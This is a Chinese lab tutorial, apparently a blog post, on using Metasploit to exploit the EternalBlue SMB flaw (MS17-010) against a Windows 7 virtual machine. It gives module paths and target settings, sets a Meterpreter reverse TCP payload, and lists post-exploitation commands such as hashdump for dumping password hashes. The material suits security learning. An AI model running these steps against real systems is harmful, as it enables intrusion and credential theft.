声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间

一、Metasploit(MSF)简介

Metasploit与2003年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。

Metasploit主要包含以下几个模块:

1.辅助模块(Auxiliary): 主要用于渗透信息收集,提供了多种漏洞的详细信息

2.漏洞渗透模块(exploits): 也叫攻击模块,利用已知的安全漏洞对远程目标系统的漏洞进行攻击

3.攻击荷载模块(payload): 成功入侵计算机后运行的一段可执行的代码

4.后渗透模块(Post): 进一步收集被攻击的目标系统的各种信息

5.编码模块(encoders): 通过对payload进行各种编码来绕过一些防御系统或防御软件的检测

二、永恒之蓝简介

永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布,5月12日被不法分子改造成了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。

*SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

三、渗透攻击过程

*实验环境

虚拟机VMware15

攻击机:Kali_linux2020版    IP地址:192.168.122.134

靶机: windows7 x64      IP地址:192.168.122.132

*两台虚拟机均以NAT方式连接,win7以关闭防火墙,可以互相ping通

*tips:担心损伤虚拟机重新配置安装很麻烦的话记得给虚拟机拍个快照哦

IP地址展示:

win7防火墙已关闭

两台虚机机之间的ping测试

实战操作步骤

首先在kali中开启postgresql数据库(kali中默认自带)

service postgresql start     //开启postgresql数据库
service postgresql status    //查看postgresql数据库运行状态,Actice那一栏显示active则成功开启,如下图

此时可以按 q 键退出查看数据库状态

这里解释一下为什么要开启postgresql数据库,这是因为msf工具需要利用postgresql数据库记录渗透扫描结果和信息

然后初始化一下msfdb数据库,它提示我需要root权限,所以我这里切换了一下root权限

看到两个黄色的感叹号说明初始化成功

然后开启msf,直接输入命令

或者在左上角的应用程序中找到漏洞利用工具,效果是一样的

这个时候我们成功进入了msf并且看到了一些相关信息,例如我们的msf是5.0.87的版本

其中由2006个攻击模块,1096个辅助模块,343个后渗透模块,562个攻击荷载模块等等

然后我们检查一下数据库的状态,看到是已经成功连接

这里我们简单介绍一下模块信息的查看,已经了解的话可以跳过,例如你可以用show exploits命令查看exploits模块,因为模块太多,需要等待一会

我这里一共找到了两千多个exploits模块信息,他们的名命格式是 操作系统/服务/名称

例如这个第0条,记录的是aix操作系统下的localf服务的ibstat_path漏洞,disclosure表示它的发布时间,rank表示它的好用级别(manual一般,excellent优秀,good良好,average平均),最后的description是描述

然后我们继续渗透

首先搜索永恒之蓝模块

auxiliary表示辅助模块,exploit表示攻击模块,我们先用辅助模块对靶机进行目标收集,看其是否存在漏洞,这里快捷选择直接用use

然后我们用options查看参数,后面required表示是否需要设置,我们只需要设置yes的选项,但是可以看到,其中的端口(rport),进程(threads)等选项已经有默认值,我们这里只需要设置rhost(目标地址)

然后我们run,根据第一行回显信息可知,目标主机很可能存在ms17_010漏洞(永恒之蓝)

然后我们利用攻击模块对其展开攻击

可以看到,我们仍然只需要设置rhosts,然后我们run或者exploit都可以

但我们看到win时,我们就攻击成功了

这个时候我们直接进入了shell,可以看到我们已经拿下了win7系统的最高权限

我们也可以查看win7的IP地址,中文字符出现了乱码的话可能要在kali上调整一下编码方式,不过还是可以看到ipv4地址与虚拟机中的一致

至此,我们拿到了目标靶机的最高权限,后面的大家就可以自己玩了,如果还有什么疑惑,欢迎留言评论或私信

!还是那句话,大家自己搭靶机玩玩就行了,切勿用于非法用途

下面是一些补充内容

*MSF基本攻击流程

这里是附加信息,已经了解的可以跳过

1.扫描靶机,检测靶机上的漏洞,选择相应的模块,例如使用ms17_010进行攻击,use auxiliary/scanner/smb/smb_ms17_010

2.options检查并设置相应的参数,例如set rhosts 192.168.1.1

3.攻击靶机,run/exploit

4.选择payload,set payload windows/x64/meterpreter/reverse_tcp

5.攻击,run/exploit

*其他攻击命令

获取hash密码:meterpreter>hashdump

查看用户权限:meterpreter>getuid

获取屏幕截图:meterpreter>screenshot

获取shell:meterpreter>shell

参考资料

https://blog.csdn.net/qq_41453285/article/details/97040039

https://blog.csdn.net/wwl012345/article/details/89421881

感谢上述博主的优秀博文

Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机相关推荐

  1. kali使用msf 通过ms17_010_eternalblue(永恒之蓝)漏洞攻击win7测试 及乱码问题解决

    两台Vmware虚拟机: Kali Win7 64位: (主机)kali的ip是 192.168.0.119 (靶机)win7的ip是192.168.0.109 使用nmap端口扫描工具,扫描一下目标 ...

  2. Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)

    1.Metasploit 渗透测试框架介绍 1.基础库:metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework-core 和 framewo ...

  3. MSF之ms17-010永恒之蓝漏洞利用

    MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...

  4. 使用ms17-010永恒之蓝漏洞对win7进行渗透

    使用ms17-010永恒之蓝漏洞对win7进行渗透 一.实验目的: 利用ms17-010永恒之蓝漏洞对win7进行渗透: 利用enable_rdp脚本开启远程桌面并创建用户: 关闭主机UAC防护策略并 ...

  5. msf之ms17-010永恒之蓝漏洞

    ** 文章主旨: ** 1.熟悉msf的基本用法. 2.熟悉一些渗透中会用到基本的windows命令. 3.复现永恒之蓝漏洞. 漏洞原理: 通过向Windows服务器的SMBv1服务发送精心构造的命令 ...

  6. 使用ms17-010永恒之蓝漏洞渗透win7系统

    实验环境 kali :192.168.249.130 win7 :192.168.249.128 1.永恒之蓝介绍: 永恒之蓝漏洞(MS17-010)通过 TCP 的445和139端口,来利用 SMB ...

  7. 学习日记1:用msf工具利用永恒之蓝漏洞攻击靶机

    一.vm虚拟机构建靶机实现互通 两个虚拟机都用NAT转换地址,设置DHCP分配IP,保证两台虚拟机和物理机在一个网段 二.kali上安装msf工具 apt-get install msf 三.msf工 ...

  8. python调用msfconsole全自动永恒之蓝攻击_永恒之蓝漏洞攻击完整步骤

    需要设备: kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn -sV -T4 ip地址 明白445端口和3 ...

  9. 永恒之蓝漏洞复现-CVE-2017-0144

    1.原理 永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码.通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需 ...

最新文章

  1. php tab标签,JavaScript代码分享:tab标签的切换
  2. 云栖大会|感受万物数字化,体验千行视频化
  3. oracle存储过程深入,深入了解oracle存储过程的优缺点
  4. @vail 判断某字段在范围内_怎么判断一台二次元影像测量仪的可靠性?
  5. 3D深度估计,让视频特效更梦幻!
  6. 驾校学员驾考成绩管理系统
  7. 未来人工智能的发展应该有哪些特征?
  8. Oracle的卸载步骤(详细图示)
  9. RabbitMmq基础(三)入门应用
  10. java libmp3lame_录制MP3格式的音频( lame 库的编译及使用)
  11. 高一的我曾对自己说要放慢脚步去生活!?
  12. 服务器千兆网卡芯片,Intel 82574L and 82576 千兆网卡芯片区别.pdf
  13. Configuring solrconfig.xml (1)
  14. 全局刷新和局部刷新的理解
  15. 计算机毕业论文系统架构,基于B/S架构的毕业论文管理系统的设计与实现
  16. 数字197可以被称为循环素数,因为197的三个数位循环移位后的数字:197,971,719均为素数。100以内这样的数字包括13个,2,3,5,7,11,13,17,31,37,71,73,79,97
  17. 浏览器内置pdf去除工具栏
  18. 如何优雅地蹭邻居家的wifi
  19. 我的第二段实习经历之实习沉淀
  20. 计算机专业和采矿工程,走近最“苦”专业:采矿工程的学生真的很“惨”吗?...

热门文章

  1. 浪潮服务器linux下升级固件,DELL戴尔PowerEdge服务器固件BIOS整体升级教程
  2. JDBC连接ORACLE的三种URL格式
  3. 机器学习(一) 拟合
  4. 燃尽图、甘特图、鱼骨图
  5. 2022高通骁龙888手机排行榜
  6. 浅拷贝和深拷贝三种方法
  7. 分布式微能源及储能系统
  8. 基于cubemx的stm32HAL库SPI通信写LCD显示屏
  9. 超高性能微波天线馈源系统设计
  10. 我为什么要旗帜鲜明地、不留余地地反对冯大辉